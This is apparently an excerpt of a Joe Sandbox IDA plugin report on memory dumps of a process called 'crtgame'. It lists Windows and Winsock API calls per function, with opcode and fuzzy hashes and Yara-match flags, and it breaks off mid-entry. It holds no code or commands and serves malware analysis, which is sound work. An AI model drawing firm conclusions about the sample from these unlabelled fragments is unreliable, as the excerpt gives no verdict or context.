                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 156438c251929bf497011ed2fd66a61d5d1236dae48ffc3d5b6e04db1fa75b35
                                                                                    • Instruction ID: 11574c61ec5c6e51aee568a47a3bd97fab124f38fe4b387da815f75331a95a1c
                                                                                    • Opcode Fuzzy Hash: 156438c251929bf497011ed2fd66a61d5d1236dae48ffc3d5b6e04db1fa75b35
                                                                                    • Instruction Fuzzy Hash: CA516EB190425ADFCB08DF68C4446AABBB1FF48320F20815EE8699B380DB70D910CFA4
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02C436A7
                                                                                      • Part of subcall function 02C42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C42432
                                                                                      • Part of subcall function 02C42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C42445
                                                                                      • Part of subcall function 02C42420: RtlEnterCriticalSection.NTDLL(?), ref: 02C42454
                                                                                      • Part of subcall function 02C42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42469
                                                                                      • Part of subcall function 02C42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02C42470
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1601054111-0
                                                                                    • Opcode ID: 8597ac6434ae5b17e75513cc9667b37f369f7437ca7b2d0775c7c3335cd98279
                                                                                    • Instruction ID: ed6245fca6a97ef18800e058c8eb1df87448befc1c977d19d91597baf277d906
                                                                                    • Opcode Fuzzy Hash: 8597ac6434ae5b17e75513cc9667b37f369f7437ca7b2d0775c7c3335cd98279
                                                                                    • Instruction Fuzzy Hash: 1711C4B5100249ABDF218E14CC85FAB3B65FF80354F204556FE92C7290CF34D960CBA4
                                                                                    APIs
                                                                                    • __beginthreadex.LIBCMT ref: 02C51B06
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,02C4A5DA,00000000), ref: 02C51B37
                                                                                    • ResumeThread.KERNELBASE(?,00000000,?,?,?,?,02C4A5DA,00000000), ref: 02C51B45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandleResumeThread__beginthreadex
                                                                                    • String ID:
                                                                                    • API String ID: 1685284544-0
                                                                                    • Opcode ID: 2aec7cdbfdb574870f8b7a4124e9d28aecba69f8810008c997de3920c6f9831b
                                                                                    • Instruction ID: 0a88617d8dd362cd3d38a0568aa636dd3c75c951b5017bfa02250b84c9992dad
                                                                                    • Opcode Fuzzy Hash: 2aec7cdbfdb574870f8b7a4124e9d28aecba69f8810008c997de3920c6f9831b
                                                                                    • Instruction Fuzzy Hash: F6F0C8743402109BD7209E5DDC88F9173D8EF88324F18056AF948C7280D3B1E8D29A94
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(02C77524), ref: 02C41ABA
                                                                                    • WSAStartup.WS2_32(00000002,00000000), ref: 02C41ACB
                                                                                    • InterlockedExchange.KERNEL32(02C77528,00000000), ref: 02C41AD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeIncrementStartup
                                                                                    • String ID:
                                                                                    • API String ID: 1856147945-0
                                                                                    • Opcode ID: 7d724d150b1f91f457565297566d129dfbc1347e29a1c04e45f781099439ec24
                                                                                    • Instruction ID: c8723423695bb941a5543ae5723ee2edf0749fa10d604528ea0965a843fb049e
                                                                                    • Opcode Fuzzy Hash: 7d724d150b1f91f457565297566d129dfbc1347e29a1c04e45f781099439ec24
                                                                                    • Instruction Fuzzy Hash: 14D05EB1D946086BF21067A6AC0EB79F7ACE704629F440B62FD6AC00C0EA506928C5F6
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44B1D
                                                                                      • Part of subcall function 02C41BA7: __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                      • Part of subcall function 02C4DA84: __EH_prolog.LIBCMT ref: 02C4DA89
                                                                                      • Part of subcall function 02C4DA84: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4DB08
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02C44C1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                    • String ID:
                                                                                    • API String ID: 1927618982-0
                                                                                    • Opcode ID: 702de43563feada03b2684b53d677ec0fa222916a529fbc454b0f851fa6da57f
                                                                                    • Instruction ID: 5a92b6025617a4aa0d397e1b52d955e89ad966a0e9ca33326b6ec885c389c68f
                                                                                    • Opcode Fuzzy Hash: 702de43563feada03b2684b53d677ec0fa222916a529fbc454b0f851fa6da57f
                                                                                    • Instruction Fuzzy Hash: 1B5129B1D04248DFDB15DFA8C884AEEFFB5AF48314F24815AE906AB351DB709A44DF60
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,?,?,00000001,?,?,02C43390,00000001,?,00000000,?,?,?,?,?), ref: 02C42D47
                                                                                    • WSASend.WS2_32(?,?,?,00000000,00000000,00000000,00000000), ref: 02C42D5C
                                                                                      • Part of subcall function 02C49E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C43114), ref: 02C49EA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Send
                                                                                    • String ID:
                                                                                    • API String ID: 1282938840-0
                                                                                    • Opcode ID: 5b781bc03ccd2a27bb39b11ec77da65a0d2d56e9ead53aad7643929c078126bb
                                                                                    • Instruction ID: 3af11f5af0da5e782ae4d3a60f21b7924df523b50e5f3dcad2f75428ecb515af
                                                                                    • Opcode Fuzzy Hash: 5b781bc03ccd2a27bb39b11ec77da65a0d2d56e9ead53aad7643929c078126bb
                                                                                    • Instruction Fuzzy Hash: 450171B5500219EFD7205F95884486BBBEDFB88764B20096EFC9983200EF709D40DBA2
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,00000000,?,02C4752F,?,02C774D8,02C774D8,?,?,02C774D8,00000000,000007E7), ref: 02C47D90
                                                                                    • shutdown.WS2_32(00000000,00000002), ref: 02C47D99
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastshutdown
                                                                                    • String ID:
                                                                                    • API String ID: 1920494066-0
                                                                                    • Opcode ID: 33c156496c796dc7d27d7e2d974ca3aae85e1249b6a24ca5cc02fb0ee13cc054
                                                                                    • Instruction ID: f23b9ac5f267d414c9bd41a900993ec47e253e6c5ab49900f2fd38afeb75aaf8
                                                                                    • Opcode Fuzzy Hash: 33c156496c796dc7d27d7e2d974ca3aae85e1249b6a24ca5cc02fb0ee13cc054
                                                                                    • Instruction Fuzzy Hash: 0EF09A71A00324CFC710AF68D404BAABBE5EF48320F018959ED95973C1EB70AC10CBA5
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C45049
                                                                                      • Part of subcall function 02C43D7E: htons.WS2_32(?), ref: 02C43DA2
                                                                                      • Part of subcall function 02C43D7E: htonl.WS2_32(00000000), ref: 02C43DB9
                                                                                      • Part of subcall function 02C43D7E: htonl.WS2_32(00000000), ref: 02C43DC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: htonl$H_prologhtons
                                                                                    • String ID:
                                                                                    • API String ID: 4039807196-0
                                                                                    • Opcode ID: b2a20fed581350c2167f2f99c609cdacb1196ad8ac1f0ec20ffe34b1f8ed1fea
                                                                                    • Instruction ID: 5bb0e14e45f7c31058ecfd059b85e0890905a45eabf28d3624cf1f0826a7fee6
                                                                                    • Opcode Fuzzy Hash: b2a20fed581350c2167f2f99c609cdacb1196ad8ac1f0ec20ffe34b1f8ed1fea
                                                                                    • Instruction Fuzzy Hash: 008149B1D0024E8FCF15DFA8D590AEEBBB5AF98310F10819BD815B7240EB356A05CFA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8bb204f7fd6949f7742b17441e4bb7b72f9262a196d6b7689180d758e0bd976
                                                                                    • Instruction ID: 0e0bf7aefb9febc28f72da59c8952e7c1a2216357282a3139edae8bd19cc09a7
                                                                                    • Opcode Fuzzy Hash: a8bb204f7fd6949f7742b17441e4bb7b72f9262a196d6b7689180d758e0bd976
                                                                                    • Instruction Fuzzy Hash: 8D4156B3908620AFE705AF19CC917B9BBE8EF44B20F0A866DE9C497341D6344C01C7D2
                                                                                    APIs
                                                                                    • SHGetSpecialFolderPathW.SHELL32(773DC1D4), ref: 02CA8846
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderPathSpecial
                                                                                    • String ID:
                                                                                    • API String ID: 994120019-0
                                                                                    • Opcode ID: 74b4be99ef06ccbd7806e36357ebd554ad6b033951d434744dc66b9f5bea282c
                                                                                    • Instruction ID: 54e88beb0bc98039265631f82905be177543555af0d7395ec9aa2bfb78e19ee9
                                                                                    • Opcode Fuzzy Hash: 74b4be99ef06ccbd7806e36357ebd554ad6b033951d434744dc66b9f5bea282c
                                                                                    • Instruction Fuzzy Hash: 414135B251C610EFE7156F09ECC17B9FBE9EF58714F06892DEAC483340E63558508B8A
                                                                                    APIs
                                                                                    • SHGetSpecialFolderPathW.SHELL32(773DC1D4), ref: 02CA8846
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderPathSpecial
                                                                                    • String ID:
                                                                                    • API String ID: 994120019-0
                                                                                    • Opcode ID: 41c4f30708317a579f0d74c30f21be379eb63d7abe75917e16e226557ff92f9a
                                                                                    • Instruction ID: 7faac6e466422a1e767e903973cc68515c46932d781f67742db406629733d4bb
                                                                                    • Opcode Fuzzy Hash: 41c4f30708317a579f0d74c30f21be379eb63d7abe75917e16e226557ff92f9a
                                                                                    • Instruction Fuzzy Hash: 6531D3B3918620AFE7046F19DC8177DBBE9EF84B64F168A2DEAC897340D6754C0087D6
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4E352
                                                                                      • Part of subcall function 02C41A01: TlsGetValue.KERNEL32 ref: 02C41A0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologValue
                                                                                    • String ID:
                                                                                    • API String ID: 3700342317-0
                                                                                    • Opcode ID: ad728965cc6e5dd0feae4d356c0519d8d51099361f2a04721213de5417285c8c
                                                                                    • Instruction ID: 98ba46f46d68180f5d86b3ec83f2de2d3257db652de5311030ff8642e0c5de30
                                                                                    • Opcode Fuzzy Hash: ad728965cc6e5dd0feae4d356c0519d8d51099361f2a04721213de5417285c8c
                                                                                    • Instruction Fuzzy Hash: 95213EB5904209AFDB15DFA5D540AFFBBF9FF48314F11452EE908A7240DB71AA00DBA1
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02C433CC
                                                                                      • Part of subcall function 02C432AB: __EH_prolog.LIBCMT ref: 02C432B0
                                                                                      • Part of subcall function 02C432AB: RtlEnterCriticalSection.NTDLL(?), ref: 02C432C3
                                                                                      • Part of subcall function 02C432AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C432EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                    • String ID:
                                                                                    • API String ID: 1518410164-0
                                                                                    • Opcode ID: 13d74a80ae3e8e728848b2f8dc574b71bb417beaed8c2eb6f37f4451c5d7ed67
                                                                                    • Instruction ID: 2c18e75eb654d100558708f951e41f2866afb184037bec465d13732e0fbc3ef5
                                                                                    • Opcode Fuzzy Hash: 13d74a80ae3e8e728848b2f8dc574b71bb417beaed8c2eb6f37f4451c5d7ed67
                                                                                    • Instruction Fuzzy Hash: 96019670214606AFD704DF59D885F56FBA9FF84324B208359E928872C0EF70ED21CBA0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4DEE2
                                                                                      • Part of subcall function 02C426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02C42706
                                                                                      • Part of subcall function 02C426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C4272B
                                                                                      • Part of subcall function 02C426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C65553), ref: 02C42738
                                                                                      • Part of subcall function 02C426DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C42778
                                                                                      • Part of subcall function 02C426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02C427D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                    • String ID:
                                                                                    • API String ID: 4293676635-0
                                                                                    • Opcode ID: dc12f1e5791dd71a65c68c2b67928182099162d0992b9f8fc3fab3d16e6855b5
                                                                                    • Instruction ID: 97065ee6df36e600f74300ac1a8974b74dcdc5608e68317d30d26c5c074847f1
                                                                                    • Opcode Fuzzy Hash: dc12f1e5791dd71a65c68c2b67928182099162d0992b9f8fc3fab3d16e6855b5
                                                                                    • Instruction Fuzzy Hash: A401D0F0A00B048FC328CF0AC284996FBF4EF88300B11C5AE944A8B721E7709A40CF94
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4DCC1
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                      • Part of subcall function 02C4DEDD: __EH_prolog.LIBCMT ref: 02C4DEE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_malloc
                                                                                    • String ID:
                                                                                    • API String ID: 4254904621-0
                                                                                    • Opcode ID: 77ff9b1b178fed4cfdc3f4ee2f64cf2980d1ed42007754f91169aed439a0fbc3
                                                                                    • Instruction ID: ab0ebea2c59822b89852458cfefa71296823e49ced193068130bdcf286693afb
                                                                                    • Opcode Fuzzy Hash: 77ff9b1b178fed4cfdc3f4ee2f64cf2980d1ed42007754f91169aed439a0fbc3
                                                                                    • Instruction Fuzzy Hash: E7E0C2B0E4420AAFCB2DEF68D80073E77A2EB44340F1045ADB809D3240DF71CA009A05
                                                                                    APIs
                                                                                      • Part of subcall function 02C5565A: __getptd_noexit.LIBCMT ref: 02C5565B
                                                                                      • Part of subcall function 02C5565A: __amsg_exit.LIBCMT ref: 02C55668
                                                                                      • Part of subcall function 02C52E93: __getptd_noexit.LIBCMT ref: 02C52E97
                                                                                      • Part of subcall function 02C52E93: __freeptd.LIBCMT ref: 02C52EB1
                                                                                      • Part of subcall function 02C52E93: RtlExitUserThread.NTDLL(?,00000000,?,02C52E73,00000000), ref: 02C52EBA
                                                                                    • __XcptFilter.LIBCMT ref: 02C52E7F
                                                                                      • Part of subcall function 02C58794: __getptd_noexit.LIBCMT ref: 02C58798
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                    • String ID:
                                                                                    • API String ID: 1405322794-0
                                                                                    • Opcode ID: c082673a58e4498dbbfcc5f07ac2665555d3c619bdac9cf0a40fd142f1b6a1e1
                                                                                    • Instruction ID: a73b27a9fb555809f0859d7b77d777003da1d78eb36130e9383f7b7764d6dcce
                                                                                    • Opcode Fuzzy Hash: c082673a58e4498dbbfcc5f07ac2665555d3c619bdac9cf0a40fd142f1b6a1e1
                                                                                    • Instruction Fuzzy Hash: 4DE0ECB5940610DFEB08BBA0D849F2D77A6EF04702F600559E9019B261DAB8ED80AF25
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C7A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C7A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c7a000_crtgame.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: a6936115910f8530429c730c4018fe48b56ac17874f95957a08111f538af69ad
                                                                                    • Instruction ID: d773ef314cba5312047d615506d7dddf9a7cfb38a29e9985c88466524fc0c144
                                                                                    • Opcode Fuzzy Hash: a6936115910f8530429c730c4018fe48b56ac17874f95957a08111f538af69ad
                                                                                    • Instruction Fuzzy Hash: F6C08CB248C30CEBC3603602FC087FABBACEB0432AF050905E36210540EB325828C5BA
                                                                                    APIs
                                                                                      • Part of subcall function 02C51010: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
                                                                                      • Part of subcall function 02C51010: CloseHandle.KERNEL32(00000000), ref: 02C510C5
                                                                                      • Part of subcall function 02C51010: ResetEvent.KERNEL32(00000000), ref: 02C510CF
                                                                                      • Part of subcall function 02C51010: CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
                                                                                    • TlsSetValue.KERNEL32(00000025,?), ref: 02C51BAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$OpenResetValue
                                                                                    • String ID:
                                                                                    • API String ID: 1556185888-0
                                                                                    • Opcode ID: 268aaa7948c8e84856ef72855affd4dbd510a6c1b5338a051c0b07efeba1c491
                                                                                    • Instruction ID: 158b4fd879a99ab8c14b40893a8961e2e46abfb0bd0143d6a5b56b128c3d7079
                                                                                    • Opcode Fuzzy Hash: 268aaa7948c8e84856ef72855affd4dbd510a6c1b5338a051c0b07efeba1c491
                                                                                    • Instruction Fuzzy Hash: AB01F272A40254AFD700CF59CC09F5ABBACFB05770F144B6AF829D3780D775A9008AE8
                                                                                    APIs
                                                                                      • Part of subcall function 02C49462: __EH_prolog.LIBCMT ref: 02C49467
                                                                                      • Part of subcall function 02C49462: _Allocate.LIBCPMT ref: 02C494BE
                                                                                    • _memset.LIBCMT ref: 02C50339
                                                                                    • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02C503A2
                                                                                    • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02C503AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateErrorFormatH_prologLastMessage_memset
                                                                                    • String ID: Unknown error$invalid string position
                                                                                    • API String ID: 2731337147-1837348584
                                                                                    • Opcode ID: ee0219efa23d16755ff08d4ca639f577ce05eb808d81498f31849a34a522baf2
                                                                                    • Instruction ID: a0d625e910067139e291fce6dbd37e08b1c174818c9aacebb8f95bc130e6b8a6
                                                                                    • Opcode Fuzzy Hash: ee0219efa23d16755ff08d4ca639f577ce05eb808d81498f31849a34a522baf2
                                                                                    • Instruction Fuzzy Hash: 7C51BC706083419FE714DF25C890B2FBBE4FB98748F500A2DF88597691D771E688CB9A
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02C54896,?,?,?,00000001), ref: 02C58F2D
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02C58F36
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: 94edd64fe9fac5269dd1b6610284219f341fde97259ee8d53c6ca56754a0b908
                                                                                    • Instruction ID: e94625acee0b3127bfeeaa361e553bb2b8bdd4d53a69a1b067218251b1858787
                                                                                    • Opcode Fuzzy Hash: 94edd64fe9fac5269dd1b6610284219f341fde97259ee8d53c6ca56754a0b908
                                                                                    • Instruction Fuzzy Hash: E7B09231484208FBCA012BD2EC0DB89BF28EB0466AF004E50F60E44061CB7254249AF2
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C424E6
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02C424FC
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C4250E
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C4256D
                                                                                    • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 02C4257F
                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02C42599
                                                                                    • GetLastError.KERNEL32(?,7591DFB0), ref: 02C425A2
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C425F0
                                                                                    • InterlockedDecrement.KERNEL32(00000002), ref: 02C4262F
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C4268E
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C42699
                                                                                    • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02C426AD
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 02C426BD
                                                                                    • GetLastError.KERNEL32(?,7591DFB0), ref: 02C426C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                    • String ID:
                                                                                    • API String ID: 1213838671-0
                                                                                    • Opcode ID: 67efc4cae7ca3f1e3f1f8f4449c920932e3e6316f49369cd6dacacdbdd41c79c
                                                                                    • Instruction ID: 69402e216f38308d91ae2551e13a147d60453109cde08ecbb09bbe8d423fcd03
                                                                                    • Opcode Fuzzy Hash: 67efc4cae7ca3f1e3f1f8f4449c920932e3e6316f49369cd6dacacdbdd41c79c
                                                                                    • Instruction Fuzzy Hash: 3D611E71900209EFCB11DFA5D589AAEFBB9FF48314F104959F956E3240DB309A54CFA1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44533
                                                                                      • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
                                                                                    • htons.WS2_32(?), ref: 02C44594
                                                                                    • htonl.WS2_32(?), ref: 02C445B7
                                                                                    • htonl.WS2_32(00000000), ref: 02C445BE
                                                                                    • htons.WS2_32(00000000), ref: 02C44672
                                                                                    • _sprintf.LIBCMT ref: 02C44688
                                                                                    • htons.WS2_32(?), ref: 02C445DB
                                                                                      • Part of subcall function 02C490C0: __EH_prolog.LIBCMT ref: 02C490C5
                                                                                      • Part of subcall function 02C490C0: RtlEnterCriticalSection.NTDLL(00000020), ref: 02C49140
                                                                                      • Part of subcall function 02C490C0: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C4915E
                                                                                      • Part of subcall function 02C41BA7: __EH_prolog.LIBCMT ref: 02C41BAC
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41BBC
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41BEA
                                                                                      • Part of subcall function 02C41BA7: RtlEnterCriticalSection.NTDLL ref: 02C41C13
                                                                                      • Part of subcall function 02C41BA7: RtlLeaveCriticalSection.NTDLL ref: 02C41C56
                                                                                      • Part of subcall function 02C4D87F: __EH_prolog.LIBCMT ref: 02C4D884
                                                                                    • htonl.WS2_32(?), ref: 02C448A7
                                                                                    • htonl.WS2_32(00000000), ref: 02C448AE
                                                                                    • htonl.WS2_32(00000000), ref: 02C448F3
                                                                                    • htonl.WS2_32(00000000), ref: 02C448FA
                                                                                    • htons.WS2_32(?), ref: 02C4491A
                                                                                    • htons.WS2_32(?), ref: 02C44924
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
